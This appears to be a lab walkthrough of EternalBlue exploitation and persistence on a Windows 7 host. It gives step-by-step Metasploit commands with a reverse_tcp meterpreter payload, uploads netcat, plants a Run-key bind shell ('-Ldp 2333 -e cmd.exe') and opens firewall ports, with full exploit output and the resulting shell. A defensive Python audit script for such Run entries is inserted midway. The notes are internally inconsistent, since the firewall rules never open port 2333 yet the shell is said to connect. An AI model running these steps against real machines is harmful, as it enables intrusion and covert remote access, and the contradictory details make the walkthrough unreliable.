Post-exploitation | Leaving an nc backdoor
Commands:
- Discover hosts on the same subnet: nmap -Pn 192.168.171.129/24
- First obtain a session in MSF
- search ms17-010
- auxiliary/scanner/smb/smb_ms17_010
- Checks whether the target is vulnerable (the EternalBlue exploit module runs this same check before it fires)
- auxiliary/admin/smb/ms17_010_command
- Executes a single command on the target over the named-pipe form of MS17-010; it needs a reachable named pipe and does not open a session by itself
- use exploit/windows/smb/ms17_010_eternalblue
- set payload windows/x64/meterpreter/reverse_tcp
- show options (check LHOST: it must be the Kali address the target can reach; in the run below the handler came up on 192.168.171.129:4444)
- set RHOSTS 192.168.171.142
- run
- Upload the nc backdoor
- upload /root/nc.exe c:\\windows\\system32 # double the backslashes: meterpreter's command line treats a single \ as an escape character
- The Run value added below must point at wherever nc actually landed; the lab's value uses C:\Users\Wind7\Desktop\nc64.exe, so the two paths have to be kept in step
- Modify the registry
- reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
- Enumerate the Run key: shows which programs start automatically on the target
- reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc64 -d 'C:\Users\Wind7\Desktop\nc64.exe -Ldp 2333 -e cmd.exe'
- Adds the nc value (type REG_SZ by default)
- -v: the registry value name (nc64), not a process name
- -d: the value data, i.e. the command line Windows runs at the next user logon
- -Ldp 2333 -e cmd.exe: -L listens and re-listens after each client disconnects (Windows nc only), -d detaches from the console, -p 2333 is the listening port, -e cmd.exe hands the connection a command prompt. This is a bind shell: Kali connects in to the target, nothing is reflected back
- reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc64
- Reads the nc64 value back to confirm the data is exactly what was set
- reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run (nc64 should now appear in the value list)
- Open the listening port in the Windows firewall, or the inbound connection to nc is dropped. This needs an administrative shell (the SYSTEM session EternalBlue gives is enough); the firewall does not have to be switched off for the rule to be added
- shell, or execute -f cmd -i -H // drop into a command prompt (-i interact with it, -H hidden window)
- In cmd: netsh firewall show opmode // show the firewall state per profile
- netsh firewall add portopening TCP 444 "textx" ENABLE ALL
- netsh firewall add portopening TCP 4444 "FireWall" ENABLE ALL
- netsh firewall add portopening TCP 9080 "QQ1" ENABLE ALL
- The port opened must be the one nc listens on: with -Ldp 2333 in the Run value above, none of these three rules lets the connection through. The legacy `netsh firewall` context still works on Windows 7, but `netsh advfirewall firewall` is its replacement
- Reboot the target (meterpreter's reboot command does it). The Run entry fires at the next interactive logon, so a user must log on (or auto-logon must be configured) before the listener exists
- From Kali, connect to the bind shell with nc
- nc 192.168.56.12 9080 (target address and the port from the Run value; in the run below that is 192.168.171.142 2333)
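The defender-side check for exactly this persistence, as an added example that is not part of the original lab notes and not a Metasploit or nc feature: a Python script that parses the text output of `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run` and `netsh firewall show portopening`, flags Run values that launch a netcat-style listener with -e, and cross-checks whether the listener's port was actually opened in the firewall. The two sample outputs embedded in the script are constructed to mirror the lab (nc64 on port 2333, rules for 444/4444/9080), not captured from a real host, and the column layout of the netsh table is an assumption about the legacy `show portopening` output.

```python
"""Audit the Windows Run key for an nc-style bind-shell backdoor.

Added example for these notes (not part of the lab and not a Metasploit feature):
parses the text output of `reg query ...\Run` and `netsh firewall show portopening`,
flags Run values that start netcat with a listen flag and -e, and checks whether the
listener's port was actually opened. Both sample outputs are constructed, not captured.
"""
import re
import shlex
from dataclasses import dataclass
from typing import Optional

LISTENER_BINARIES = {"nc", "nc64", "nc32", "ncat", "netcat"}

# Constructed: `reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"` on the lab host
REG_QUERY_OUTPUT = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    VMware VM3DService Process    REG_SZ    "C:\Windows\system32\vm3dservice.exe" -u
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
    nc64    REG_SZ    C:\Users\Wind7\Desktop\nc64.exe -Ldp 2333 -e cmd.exe
"""

# Constructed: `netsh firewall show portopening` after the notes' three add portopening
# commands (legacy table layout assumed; note that 2333 was never opened)
NETSH_OUTPUT = """
Port configuration for Standard profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
444    TCP       Enable   textx
4444   TCP       Enable   FireWall
9080   TCP       Enable   QQ1
"""

@dataclass
class Finding:
    value_name: str
    binary: str
    listening: bool
    listen_port: Optional[int]
    exec_target: Optional[str]
    firewall_open: Optional[bool] = None   # None when no port could be parsed

def parse_run_key(text):
    """Map Run value name -> command line (REG_SZ / REG_EXPAND_SZ rows of `reg query`)."""
    entries = {}
    for line in text.splitlines():
        m = re.match(r"^\s+(.+?)\s{2,}REG_(?:EXPAND_)?SZ\s+(.*\S)\s*$", line)
        if m:
            entries[m.group(1)] = m.group(2)
    return entries

def parse_netsh_portopening(text):
    """Collect (port, protocol) pairs whose portopening rule is in Mode=Enable."""
    opened = set()
    for line in text.splitlines():
        m = re.match(r"^\s*(\d+)\s+(TCP|UDP)\s+(Enable|Disable)\b", line, re.I)
        if m and m.group(3).lower() == "enable":
            opened.add((int(m.group(1)), m.group(2).upper()))
    return opened

def analyze_command(value_name, command):
    """Return a Finding if the command runs nc/ncat, with its listen port and -e target."""
    tokens = [t.strip('"') for t in shlex.split(command, posix=False)]
    if not tokens:
        return None
    exe = tokens[0].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    exe = exe[:-4] if exe.endswith(".exe") else exe
    if exe not in LISTENER_BINARIES:
        return None
    args = tokens[1:]
    listening, port, target = False, None, None
    for i, tok in enumerate(args):
        if not tok.startswith("-") or tok.startswith("--") or len(tok) < 2:
            continue                              # only short, possibly clustered flags (-Ldp)
        letters = tok[1:]
        nxt = args[i + 1] if i + 1 < len(args) else None
        if "l" in letters.lower():                # -l, or Windows nc -L (re-listen after close)
            listening = True
        if ("p" in letters or "l" in letters.lower()) and nxt and nxt.isdigit():
            port = int(nxt)                       # -Ldp 2333, -lvp 4444, ncat -l 2333
        if ("e" in letters or "c" in letters) and nxt and not nxt.isdigit():
            target = nxt                          # program whose stdio is bound to the socket
    return Finding(value_name, exe, listening, port, target)

def audit(reg_output, netsh_output):
    """Cross-check every netcat Run entry against the TCP ports opened in the firewall."""
    opened = parse_netsh_portopening(netsh_output)
    findings = []
    for name, cmd in parse_run_key(reg_output).items():
        f = analyze_command(name, cmd)
        if f is None:
            continue
        if f.listen_port is not None:
            f.firewall_open = (f.listen_port, "TCP") in opened
        findings.append(f)
    return findings

if __name__ == "__main__":
    for f in audit(REG_QUERY_OUTPUT, NETSH_OUTPUT):
        state = "reachable" if f.firewall_open else "blocked by firewall"
        print(f"[!] Run\\{f.value_name}: {f.binary} listens on {f.listen_port} -> {f.exec_target} ({state})")
```

Run it on saved copies of the two command outputs. On the constructed lab data it reports the nc64 bind shell on 2333 as blocked, which is the gap between the Run value and the three portopening rules above: the listener exists after logon, but nothing reaches it until a rule for 2333 is added or the firewall is off. The flag parser deliberately handles clustered switches (-Ldp) as well as ncat's separate -l PORT form, so it generalises beyond the single command line in the notes.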
Lab results:
Executing "sudo msfdb init && msfconsole"
[i] Database already started
[i] The database appears to be already configured, skipping initialization
(msfconsole banner omitted)
=[ metasploit v5.0.93-dev ]
+ -- --=[ 2029 exploits - 1103 auxiliary - 344 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Use help <command> to learn more about any command
[*] Starting persistent handler(s)...
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.171.142
RHOSTS => 192.168.171.142
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.171.129:4444
[*] 192.168.171.142:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[*] 192.168.171.142:445 - Scanned 1 of 1 hosts (100% complete)
[-] 192.168.171.142:445 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploit completed, but no session was created.
(first attempt: the check reported not-vulnerable; the second run below succeeded)
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.171.129:4444
[*] 192.168.171.142:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.171.142:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.171.142:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.171.142:445 - Connecting to target for exploitation.
[+] 192.168.171.142:445 - Connection established for exploitation.
[+] 192.168.171.142:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.171.142:445 - CORE raw buffer dump (40 bytes)
[*] 192.168.171.142:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
[*] 192.168.171.142:445 - 0x00000010  61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63  asic 7601 Servic
[*] 192.168.171.142:445 - 0x00000020  65 20 50 61 63 6b 20 31                          e Pack 1
[+] 192.168.171.142:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.171.142:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.171.142:445 - Sending all but last fragment of exploit packet
[*] 192.168.171.142:445 - Starting non-paged pool grooming
[+] 192.168.171.142:445 - Sending SMBv2 buffers
[+] 192.168.171.142:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.171.142:445 - Sending final SMBv2 buffers.
[*] 192.168.171.142:445 - Sending last fragment of exploit packet!
[*] 192.168.171.142:445 - Receiving response from exploit packet
[+] 192.168.171.142:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.171.142:445 - Sending egg to corrupted connection.
[*] 192.168.171.142:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 192.168.171.142
[*] Meterpreter session 1 opened (192.168.171.129:4444 -> 192.168.171.142:49159) at 2020-06-23 13:04:01 +0800
[+] 192.168.171.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.171.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.171.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run
  Values (3):
    VMware VM3DService Process
    VMware User Process
    nc64
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc64
Key: HKLM\software\microsoft\windows\currentversion\run
Name: nc64
Type: REG_SZ
Data: C:\Users\Wind7\Desktop\nc64.exe -Ldp 2333 -e cmd.exe
meterpreter >
The backdoor was planted successfully: after the reboot and logon, connecting from Kali to port 2333 on the target returns a command prompt.
root@brother:~# nc 192.168.171.142 2333
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>